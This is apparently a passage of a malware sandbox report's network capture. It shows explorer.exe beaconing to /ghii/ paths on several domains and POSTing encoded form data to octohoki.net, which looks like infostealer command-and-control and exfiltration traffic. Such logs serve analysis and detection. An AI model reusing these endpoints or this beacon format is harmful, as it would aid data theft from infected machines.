SmEjqqbeB3S8PivTg4NEX9qFNOPpSFrFNs2Oaq407NKeLpHVCEbf6BDQcaU_4qZOl0exgORnJ0(zReY8eNttrvnYjxMLTkqw2HqrGwzGkUafe1Mx2jN0Vb4ig25e5qRghAGI71X7BHfO7huSR5Z1nKxkFIegjT(-QqoTNfMNZR7ERUusjNXIMmkDq4DwCzcZfDLoXMFHDfIfqWZCx_iCjbinqxQ0Wc(-9ZDvlYLGbPsODviy2n8JnrTUB8slmoGVEyIHruPv5ECdZJjPPQ57IrvEMp7J9rsD24cV~nvNPIptFLUN~zrBVkb5Dl9Y2SoDyPsIC8l6yL1vY9Ti4XmR4rSd6kFXm1kiwB4xjspeE7l1aDTvXS7M6zTOOx9XghFlIujBf9nx5pJ51HdtHB(I3tE0WPD_~tdR2Qd27X~QxdgsswrUvriWXv0oDh(D9iWo8qMwlxOMXNY8vBPpri4e5AAzFrSSonzSAX9xbbMV3tsq~QjPlRLOHTODYKPErYYUkGFCGVSc8DxwBT7bNEvAjOmq3EwI~kdS7GJ9gyeg2SsChLMjd0poJei6BgPvGZMVVgVwsOyZHJLwnz5PtUxo(ldZjp(D~-CuWVFZq455bYd2C44
                                                                                            Feb 18, 2023 13:06:57.593218088 CET151INHTTP/1.1 404 Not Found
                                                                                            Date: Sat, 18 Feb 2023 12:06:57 GMT
                                                                                            Content-Type: text/html
                                                                                            Content-Length: 867
                                                                                            Connection: close
                                                                                            Server: Apache/2
                                                                                            Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT
                                                                                            Accept-Ranges: bytes
                                                                                            Age: 0
                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                            Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; } body{ margin:0; border: 0; padding: 0; } </style> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script> <script type="text/javascript" language="JavaScript"> var url = 'http://www.searchvity.com/?dn=' + document.domain + '&pid=9POL6F2H4'; $(document).ready(function() { $('#ad_frame').attr('src', url); }); </script> </head> <body> <iframe id="ad_frame" src="http://www.searchvity.com/" frameborder="0" scrolling="no"> ... browser does not support iframe's --> </iframe> </body></html>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                            6192.168.2.34970666.96.162.14980C:\Windows\explorer.exe
                                                                                            TimestampkBytes transferredDirectionData
                                                                                            Feb 18, 2023 13:07:00.093044043 CET152OUTGET /ghii/?Y5=b9pmEiWE3A9hICRLJ48/0GIWTdcguNEQkRUuEoMGZR2jfpcIS7+82C+h9uoa2hbDMoucG0FStkg6AqIGzw0t5S24GXeXAGyBig==&9WI6t=QaRcz HTTP/1.1
                                                                                            Host: www.genuineinsights.cloud
                                                                                            Connection: close
                                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                                            Data Ascii:
                                                                                            Feb 18, 2023 13:07:00.226228952 CET153INHTTP/1.1 404 Not Found
                                                                                            Date: Sat, 18 Feb 2023 12:07:00 GMT
                                                                                            Content-Type: text/html
                                                                                            Content-Length: 867
                                                                                            Connection: close
                                                                                            Server: Apache/2
                                                                                            Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT
                                                                                            Accept-Ranges: bytes
                                                                                            Age: 0
                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                            Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; } body{ margin:0; border: 0; padding: 0; } </style> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script> <script type="text/javascript" language="JavaScript"> var url = 'http://www.searchvity.com/?dn=' + document.domain + '&pid=9POL6F2H4'; $(document).ready(function() { $('#ad_frame').attr('src', url); }); </script> </head> <body> <iframe id="ad_frame" src="http://www.searchvity.com/" frameborder="0" scrolling="no"> ... browser does not support iframe's --> </iframe> </body></html>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                            7192.168.2.349707198.54.117.21680C:\Windows\explorer.exe
                                                                                            TimestampkBytes transferredDirectionData
                                                                                            Feb 18, 2023 13:07:05.468234062 CET154OUTPOST /ghii/ HTTP/1.1
                                                                                            Host: www.octohoki.net
                                                                                            Connection: close
                                                                                            Content-Length: 184
                                                                                            Cache-Control: no-cache
                                                                                            Origin: http://www.octohoki.net
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Accept: */*
                                                                                            Referer: http://www.octohoki.net/ghii/
                                                                                            Accept-Language: en-US
                                                                                            Accept-Encoding: gzip, deflate
                                                                                            Data Raw: 59 35 3d 72 5a 6e 54 4d 5a 52 69 46 75 51 4c 79 4e 6d 72 33 42 34 79 59 54 51 58 45 59 56 35 79 37 45 37 47 5a 4a 4e 63 41 77 4c 59 62 6f 54 41 43 56 37 45 59 4e 4f 49 4c 6c 41 74 35 35 63 64 4f 64 59 31 7a 71 51 34 36 59 6f 4c 50 4e 42 4d 67 51 4f 44 30 59 78 55 35 6d 4c 37 49 6d 47 71 45 6b 70 35 46 35 38 47 67 45 76 58 75 64 2d 4b 5a 32 31 30 64 6a 6e 37 50 76 35 45 75 51 63 73 43 52 53 58 67 35 54 45 49 76 35 41 53 66 39 76 46 31 49 55 6a 4d 68 75 6b 53 6b 4d 43 5a 77 71 78 4a 6d 47 47 52 72 70 71 64 71 75 75 58 43 5a 52 6c 78 49 51 29 2e 00 00 00 00 00 00 00 00
                                                                                            Data Ascii: Y5=rZnTMZRiFuQLyNmr3B4yYTQXEYV5y7E7GZJNcAwLYboTACV7EYNOILlAt55cdOdY1zqQ46YoLPNBMgQOD0YxU5mL7ImGqEkp5F58GgEvXud-KZ210djn7Pv5EuQcsCRSXg5TEIv5ASf9vF1IUjMhukSkMCZwqxJmGGRrpqdquuXCZRlxIQ).
                                                                                            Feb 18, 2023 13:07:05.641413927 CET155INHTTP/1.1 405 Not Allowed
                                                                                            Date: Sat, 18 Feb 2023 12:07:05 GMT
                                                                                            Content-Type: text/html
                                                                                            Content-Length: 154
                                                                                            Connection: close
                                                                                            Server: namecheap-nginx
                                                                                            Allow: GET, HEAD
                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                            8192.168.2.349708198.54.117.21680C:\Windows\explorer.exe
                                                                                            TimestampkBytes transferredDirectionData
                                                                                            Feb 18, 2023 13:07:08.354231119 CET161OUTPOST /ghii/ HTTP/1.1
                                                                                            Host: www.octohoki.net
                                                                                            Connection: close
                                                                                            Content-Length: 5332
                                                                                            Cache-Control: no-cache
                                                                                            Origin: http://www.octohoki.net
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Accept: */*
                                                                                            Referer: http://www.octohoki.net/ghii/
                                                                                            Accept-Language: en-US
                                                                                            Accept-Encoding: gzip, deflate
                                                                                            Data Raw: 59 35 3d 72 5a 6e 54 4d 5a 52 69 46 75 51 4c 7a 70 61 72 79 6d 45 79 4e 6a 51 57 64 6f 56 35 34 62 45 5f 47 5a 56 4e 63 42 31 47 59 70 6b 54 41 56 5a 37 45 39 35 4f 54 4c 6c 41 72 35 35 51 5a 4f 64 4b 31 7a 7e 71 34 37 70 54 4c 4e 68 42 57 57 55 4f 46 6b 59 32 4a 4a 6d 4b 33 6f 6d 48 30 30 6b 70 35 45 46 4f 47 69 38 5f 58 76 6c 2d 4c 71 7e 31 30 66 4c 67 70 50 76 38 59 65 51 63 73 43 64 6e 58 67 34 6d 45 49 58 70 41 53 28 39 76 54 5a 49 61 53 4d 69 70 30 53 5f 47 69 5a 6c 6c 41 49 36 46 58 6c 71 71 4c 46 70 6a 2d 37 4d 63 42 77 4b 53 47 68 4b 4e 66 72 6a 7e 35 5a 38 63 4a 39 2d 70 70 32 78 51 4c 77 35 41 54 69 51 31 2d 66 57 42 79 66 5a 38 65 30 37 46 44 32 68 78 4b 41 34 37 4f 37 51 76 77 35 4f 39 38 7a 57 33 48 7a 34 30 37 4d 31 43 6b 4e 4b 4f 62 48 7a 4c 65 47 53 66 5a 31 78 52 47 7a 50 64 44 54 52 31 54 7a 65 45 61 37 30 31 47 66 6a 64 67 39 48 73 56 4b 5f 4e 36 64 6c 36 50 31 75 35 6c 30 2d 56 54 38 55 4c 6e 58 62 51 32 52 4e 52 59 62 52 70 74 41 43 49 72 32 5a 46 61 39 63 75 2d 59 67 30 34 79 76 79 61 34 51 69 51 62 72 46 66 43 4e 58 77 32 51 6e 48 53 62 51 53 6c 62 30 79 6f 4c 78 5a 56 4d 59 67 79 6c 6a 72 44 43 6d 72 50 34 54 67 34 53 45 7a 66 4e 69 75 7a 31 66 4b 4d 70 77 6c 47 30 7e 75 50 55 77 7a 35 78 67 61 44 77 6a 74 32 49 49 45 75 6f 39 57 5a 48 36 79 52 6e 37 68 6d 6e 77 6a 5a 51 42 6e 4e 36 73 5f 35 4b 69 73 63 6d 62 55 69 6b 73 30 34 37 30 36 68 48 6f 4b 6d 33 48 6d 56 57 4c 38 6c 66 65 5a 6f 59 30 55 39 38 74 66 7e 67 59 39 61 6a 52 74 63 4b 66 71 63 41 63 76 37 59 43 6c 78 6d 6f 53 65 47 51 4b 43 71 35 74 53 61 42 77 34 5a 7e 41 54 64 44 66 6f 6a 72 36 70 49 32 58 4e 4f 57 76 4d 36 33 35 33 44 47 6b 75 59 75 4f 32 32 49 66 34 42 4b 33 44 42 67 33 46 42 79 62 41 79 47 6f 75 73 77 57 6d 73 31 6b 4a 55 6b 33 73 49 35 61 30 59 6f 4b 70 57 5a 42 35 42 51 48 7e 6e 33 39 75 76 45 52 52 79 46 67 79 58 6b 5f 70 52 4d 2d 5a 65 50 35 5a 67 67 41 6b 48 5a 46 5a 6e 4c 74 73 75 6e 70 54 61 6d 78 43 73 56 4f 64 4c 6a 68 42 46 77 50 71 73 46 5f 34 59 51 39 37 74 72 32 76 74 64 31 6e 30 59 48 7a 6d 77 38 4f 51 6c 48 36 44 65 73 72 79 43 54 46 4d 50 66 36 72 4b 4c 56 6e 59 64 42 59 41 78 45 76 64 66 74 71 69 32 69 4f 6d 61 45 4a 6f 31 48 5f 41 2d 46 7a 5a 46 76 77 44 33 32 43 75 64 77 75 75 62 43 50 4d 78 6b 62 33 4c 59 6d 64 73 33 2d 55 30 34 57 78 73 39 6f 61 4c 4b 72 63 6d 48 4b 38 57 5a 59 6c 4e 65 77 42 5a 53 67 28 63 43 52 38 2d 74 6f 67 77 34 44 4e 42 59 54 78 67 53 68 69 45 4c 72 4f 46 6f 6d 70 6d 34 55 73 4a 34 58 47 36 57 78 74 6d 64 5f 68 76 73 51 53 46 55 4e 6c 43 34 66 49 44 38 69 53 57 52 56 32 6e 6d 62 52 6d 43 6f 37 39 54 63 34 6b 48 47 73 78 71 62 41 78 75 6e 68 37 61 54 79 71 71 63 4b 73 65 69 55 36 37 49 56 64 73 4b 67 75 4a 61 4e 73 39 70 57 52 4d 6d 62 41 42 6c 45 39 74 56 35 78 37 53 70 51 5a 6b 79 69 70 45 5a 32 59 67 4a 45 4d 6c 79 49 63 6c 4e 47 47 77 4e 47 59 79 79 63 28 69 6d 50 76 32 51 34 53 4c 42 76 42 6a 79 61 28 58 59 56 57 34 4a 31 77 55 56 36 76 6f 79 54 4e 7a 46 2d 6a 46 6c 54 36 41 4a 6f 70 73 4b 65 31 4c 35 46 65 42 53 6f 39 74 42 6c 4a 59 4f 69 77 73 5a 6e 6b 74 48 47 32 55 76 30 71 75 32 47 58 38 30 42 6a 43 49 5f 67 50 37 6e 56 6b 69 66 7e 4c 71 61 67 79 62 5a 50 59 39 77 63 63 78 4a 6c 45 53 78 77 51 59 36 43 67 77 6c 75 35 30 69 77 56 4e 53 6d 31 31 61 69 46 50 5a 72 56 58 72 53 67 66 52 57 35 47 52 68 47 42 59 46 5a 33 70 4c 69 62 6a 48 72 74 57 56 74 39 6b 64 61 63 73 47 65 6b 63 51 4f 54 6f 61 51 45 75 63 5f 74 41 35 77 30 48 71 42 79 33 68 33 65 62 6d 69 69 42 70 35 51 62 77 63 5a 48 4f 47 50 31 67 58 63 59 30 65 79 67 6e 55 49 31 57 44 64 63 75 39 7a 78 68 30 28 72 7e 5a 47 4f 28 39 4a 30 61 59 6b 45 76 42 4a 65 37 77 7e 68 62 39 6f 72 63 51 59 6e 6e 66 6f 47 32 6b 62 5f 6c 50 4a 59 55 68 64 43 4c 63 78 4a 61 30 76 72 68 75 46 62 76 46 61 34 67 67 50 42 69 31 6e 78 48 4f 4b 68 41 79 66 48 4d 64 38 72 77 69 31 41 6b 69 44 44 74 6a 73 69 39 55 7e 71 4d 4d 49 68 67 49 67 68 43 6c 5a 74 35 54 39 6f 70 38 41 4d 67 6a 30 57 53 45 45 49 53 54 41 4e 52 41 68 30 68 54 74 78 4c 6e 75 44 32 52 39 2d 55 35 35 59 72 70 66 30 6f 4f 7a 72 4a 33 7e 70 34 43 79 36 70 77 67 57 33 77
                                                                                            Data Ascii: Y5=rZnTMZRiFuQLzparymEyNjQWdoV54bE_GZVNcB1GYpkTAVZ7E95OTLlAr55QZOdK1z~q47pTLNhBWWUOFkY2JJmK3omH00kp5EFOGi8_Xvl-Lq~10fLgpPv8YeQcsCdnXg4mEIXpAS(9vTZIaSMip0S_GiZllAI6FXlqqLFpj-7McBwKSGhKNfrj~5Z8cJ9-pp2xQLw5ATiQ1-fWByfZ8e07FD2hxKA47O7Qvw5O98zW3Hz407M1CkNKObHzLeGSfZ1xRGzPdDTR1TzeEa701Gfjdg9HsVK_N6dl6P1u5l0-VT8ULnXbQ2RNRYbRptACIr2ZFa9cu-Yg04yvya4QiQbrFfCNXw2QnHSbQSlb0yoLxZVMYgyljrDCmrP4Tg4SEzfNiuz1fKMpwlG0~uPUwz5xgaDwjt2IIEuo9WZH6yRn7hmnwjZQBnN6s_5KiscmbUiks04706hHoKm3HmVWL8lfeZoY0U98tf~gY9ajRtcKfqcAcv7YClxmoSeGQKCq5tSaBw4Z~ATdDfojr6pI2XNOWvM6353DGkuYuO22If4BK3DBg3FBybAyGouswWms1kJUk3sI5a0YoKpWZB5BQH~n39uvERRyFgyXk_pRM-ZeP5ZggAkHZFZnLtsunpTamxCsVOdLjhBFwPqsF_4YQ97tr2vtd1n0YHzmw8OQlH6DesryCTFMPf6rKLVnYdBYAxEvdftqi2iOmaEJo1H_A-FzZFvwD32CudwuubCPMxkb3LYmds3-U04Wxs9oaLKrcmHK8WZYlNewBZSg(cCR8-togw4DNBYTxgShiELrOFompm4UsJ4XG6Wxtmd_hvsQSFUNlC4fID8iSWRV2nmbRmCo79Tc4kHGsxqbAxunh7aTyqqcKseiU67IVdsKguJaNs9pWRMmbABlE9tV5x7SpQZkyipEZ2YgJEMlyIclNGGwNGYyyc(imPv2Q4SLBvBjya(XYVW4J1wUV6voyTNzF-jFlT6AJopsKe1L5FeBSo9tBlJYOiwsZnktHG2Uv0qu2GX80BjCI_gP7nVkif~LqagybZPY9wccxJlESxwQY6Cgwlu50iwVNSm11aiFPZrVXrSgfRW5GRhGBYFZ3pLibjHrtWVt9kdacsGekcQOToaQEuc_tA5w0HqBy3h3ebmiiBp5QbwcZHOGP1gXcY0eygnUI1WDdcu9zxh0(r~ZGO(9J0aYkEvBJe7w~hb9orcQYnnfoG2kb_lPJYUhdCLcxJa0vrhuFbvFa4ggPBi1nxHOKhAyfHMd8rwi1AkiDDtjsi9U~qMMIhgIghClZt5T9op8AMgj0WSEEISTANRAh0hTtxLnuD2R9-U55Yrpf0oOzrJ3~p4Cy6pwgW3wm8RbTsOp(6jqXUTN664DBPsT~KIa3CdaRinPWOD74Zrzu7KOQb3dVDS63dMTX4oo8ZDRDDYLkZDqEPb7OSH98pp8fGTJEzd7NMriTFz3Q9zKfxXnX_Rmld8Tyl~J7qB-6-AHKnYdnS1Ztz2oarPb3-pEUwBsrb~BKfnkmBdgFGDdZ4ZolD~NXQoqTdChwBx43YXCESZ77TGeuKoIN0j2M8ObY8SKQvYEYUa2AVXjGTEnEVLmAUMnBp6cCC5AAuqsmyeYa_qwrnJSD4KerAtE10YUu4zej5Z1aT3hkTzON-~SWdsGrLHsH-Hf6D1KKLu4OUj1vRt39HgscopH5GfYc9OdMzULY4tUWBC7UVHFLTtNF4USYrmiD4qgDBbwVaKb(URTEYCtL8KE5GxfJ44RSIHUhllYJALIeKUfRtFfe2uZ9IExVaCxUDjEeQ3mFSa4f8XrGLh6SSp9CsgP61R2e8xyT6UWiyAvzEQ2FMG17_UmAn5uknFgfEIUoNVFQzDpJcwq4-HtCAUDOVRL3a84ZbI7tjmJxnaCmBrfXVfT6atWVGExpU0XYLyFLLSl5-TBJky4AsxcHr2rVCYeFXBFkjrvRbbODf(BRR9xrAUs8vSchR27(9NUh61j6kkuqybS7mKMCwGe~m5LIGtJKJQdg39GhIwiaxTkrc0APOUetOr4rjgM5Z8qxVBxwNZpw6nFyC86vh6QH-ubNMgpg3yA8qLvVFC7jrG7IYnZZArcZ5VZtDgKmmVqnMyB(32WlIQCrrAC3PhU9G15iTAqU_2wyaMirb2AARYJI6gO6hA_wJR4d40BsljbcF(P90lTCYdUbm~qUQQBpjwpWnXVCFob3Fj3M5PdXkJM~DRaGOa9AwcNRkSckQUPF6~nE_0dgIL5~49l1zF8(rXl8NIWM_ROqOBpYqD3A0uU~6wcCJ3VMUCEbYOWuyg_cICxB9pRw45PPnJCf40SRNoJC5cnArdowjKy5YhC(9mmavz_YZy12LD5nOOlglkG~Hj8doFWZO7YFjVLONdmPshE6IJJCl3-I7DwUZudsdLmZORy2hZ9PgNng4PZAgWF4JlnLHcYrAA51lU1mQr0lrzHdeQANk~dJvQfehqJ62LVGLETUe0G6pZZ8BDi99qFh-wy4yCNVYZ8I-NhmlvbAkekxUPZZvSdT1qjS7iT4tdavIN2~TvS46g6RiyREBTwTrRs(LKbeweyQSUqgygc3gUwxENHFZWxnTTun_eszJKG7KjOjlbo8wN44j8-lCyhsoLnQCdCJ53VN1bmXbVPiRAs6VmJfQdw(1FiC72Gs0WxSqlKsF0708PHPLQUmwva45H-59RV42Ib6N4fcL(285EWcLlQjzdni3OeVnJoQS(NGpB_kjUalXCBgK8tK2erR1uWawPnybjo5hv8WFq_6uhLoD1Qo5J9Hvf-3FrfHgKsr7bQb6Od1DQ4j2apf-aXf5aHgbshf3cg5EsIDBzojfW_k7TLUPZnHnJT2lvLzEeUhNHrY2rJka7da3oJ90yQE9awvwj9MzOUKdF0vOrIzofQ(apNz1eHjC74TOm4(OkVNA4-sqU2LQ5prlNHgORJLwSdTH(kucydQf0AiFFXi63M~ZIWJLf5~8cEhq(z1Vy99JUoKWJmPXEtVyLGrILAtPPxLSUDqjzK~Hs9ZiPEGkzpeyIVCW4Bp49CRlvJi_R3B4fUj5JrnpOQVFL-KQnyUE(5LEeOZpBAchp2u8Xl23eW(bLsLUKLmQ3jFmu2sgUIcwbJ4W4mYNWcLRkA~JPTojAjDx~QzWx1QaI0z5t-3QXjLkfJR9Lmze6lgXgRa4kdVktjLtq0SMQ-lNx0ocYCW5TBYhd5kd60eFeIT-BGzysg65Hryw5p3rNvnhE2IGtHfLvXMIjUGYbMpzHcUNIXo8(Qw5zHEhJgbkqw7ij7eY0so3(99YmvbJhw4drhBvri03zV2xoSv5WZYlZlKpK2GsOUpFOWAF5KZVZ4fHRFuQwo0oYI4HnWhHeCNbP5DQyM3hJ6Yz5qvzYqrSbIbSJWoIhj(lcQDggQ25(9sZ(nuN5H44elcvXQTPmt5j8il6kq1yEdgeS_9pmSIYqGHVRisa(JeVlmeGIjbacbAdFtkn8oV15CZ7GmSkesdiAvszdGoIe_AqpfpONkpvVcWCOKQJl3o60EB0GPcLZ8291gJCBxA5G8jnVa5vm2XtcfRjo7rG5UZnCbDvHFqgvyD2IrwqZAbgDxf2vWu3kfTxY_e3xnQ6TXoCL7SpH2x7Oo3v9-Jt4L7zJl2lpgsjqmxDWx9AEgJPDqYgyD5-obITgiZgig3AeWuVThcOsfqEtYoXiZ08De3eF0rtgQ2lFfIqWT03yHLcDGsIybESUljjsdDzQxxGZt20i-T3zzNWhSf_E-bzpWvGJo8fMQc1WFbKJnm4Y63YyO0N9FTmuAjxShPe0zpJg3AYEw9bMr9K8tc5qoIW~5XmMT~-NABT8QQZWIjCbVj1jjnll-0yIiqTt2yEDsPOGr9P16UWOAtYwlID(ozFB33Uf0MusuP6iQQkA52RJrm8eFEgyNYOQU8bEyH42StNg32eApZjIjO6n9Y8yGFrusrT3DZMGb8o34pUz4B4HeTgBt9Dz5XM3MneTPlhWazerszcJ5leX_bVkuvsn7bcgETyoqCmOfOhi8cVDwdCZDJU4g7nOcpJy8uxvZDqDYgAIJdTTpzJs-g8O4EwB62vq
